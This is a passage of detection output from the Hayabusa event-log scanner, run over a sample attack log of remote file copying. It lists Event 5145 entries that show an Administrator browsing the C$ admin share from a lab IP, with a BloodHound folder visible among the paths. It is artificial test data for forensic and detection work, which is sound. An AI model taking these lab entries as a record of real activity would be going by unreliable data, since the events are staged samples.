Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network 
Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded 
TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
